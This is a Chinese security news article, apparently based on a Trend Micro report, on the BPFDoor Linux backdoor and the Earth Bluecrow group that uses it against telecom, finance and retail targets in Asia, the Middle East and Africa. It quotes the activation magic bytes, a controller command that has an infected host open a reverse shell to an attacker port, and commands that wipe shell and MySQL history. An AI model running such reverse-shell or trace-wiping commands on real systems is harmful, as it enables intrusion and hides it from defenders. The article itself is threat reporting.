隐秘的类Rootkit恶意软件BPFDoor利用反向Shell渗透被入侵网络
一种名为BPFDoor的Linux后门恶意软件利用BPF技术实现高度隐蔽性,在亚洲等地区针对电信等行业展开攻击。该恶意软件由Earth Bluecrow组织使用已活跃四年以上,并具备清除系统痕迹及跨多种协议运行的能力。 2025-4-14 14:43:10 Author: www.freebuf.com(查看原文) 阅读量:3 收藏

freeBuf

主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

image

高级隐蔽后门威胁多国企业

一种名为BPFDoor的复杂后门恶意软件正在亚洲、中东和非洲地区活跃攻击各类组织,该软件采用高级隐蔽技术规避检测。这款Linux后门利用伯克利包过滤(BPF)技术在内核层面监控网络流量,使其能够躲过常规安全扫描,同时维持对被入侵系统的持久访问。

近期攻击记录显示,BPFDoor主要针对电信、金融和零售行业,受害者分布在韩国、香港、缅甸、马来西亚和埃及等地。

Google News.png

无端口监听特性增加检测难度

该恶意软件无需监听网络端口即可运行,这使得传统的端口扫描等安全措施难以发现其存在,导致其能够长期潜伏。趋势科技研究人员将攻击者追踪为Earth Bluecrow(又名Red Menshen),这是一个使用BPFDoor进行网络间谍活动的高级持续性威胁(APT)组织。

根据遥测数据,该组织已活跃至少四年,最早可追溯到2021年的多起事件。BPFDoor的设计使其能够向操作系统内核注入BPF过滤器,通过检查网络数据包并在收到特定"魔法序列"(触发后门功能的预定字节模式)时激活。

这种类Rootkit功能使BPFDoor能够伪装系统进程名称并采用其他规避策略,完美融入系统环境。对于受感染组织而言,该后门会建立持久且几乎不可见的通道,使攻击者能够长期访问敏感数据和系统,成为长期间谍活动的理想工具。

反向Shell机制:隐藏控制核心

BPFDoor的核心能力来自其控制器模块,该模块允许攻击者与受感染主机建立反向Shell连接。此功能使威胁行为者能够深入渗透被入侵网络,实现横向移动并访问更多系统和敏感数据。

控制器发送的激活数据包包含:

  • 魔法字节(如TCP协议使用0x5293,UDP协议使用0x7255)
  • 目标连接所需的远程IP地址和端口
  • 身份验证密码

反向连接模式流程图(来源:趋势科技)

当配置正确时,这将从受害机器向攻击者系统发起反向Shell连接。

`./controller -cd 22 -h 192.168.32.156 -ms 8000`

该命令指示控制器要求受感染机器(192.168.32.156)向攻击者机器的8000端口发起反向Shell连接。

清除攻击痕迹的恶意设计

恶意软件作者还加入了清除系统活动痕迹的措施:

`export MYSQL_HISTFILE=/dev/null export HISTFILE=/dev/null`

这些命令会禁用命令历史记录,表明攻击者专门针对运行MySQL数据库软件的系统。

由于BPFDoor能够跨多种协议(TCP、UDP和ICMP)运行,且攻击者可轻松修改用于激活的魔法字节序列,网络防御人员检测该威胁仍面临挑战。随着该威胁持续演变,各组织必须部署能够检测BPFDoor通信和激活序列特定模式的高级监控解决方案。

参考来源:

Stealthy Rootkit-Like Malware Known as BPFDoor Using Reverse Shell to Dig Deeper into Compromised Networks

本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)


文章来源: https://www.freebuf.com/articles/427556.html
如有侵权请联系:admin#unsafe.sh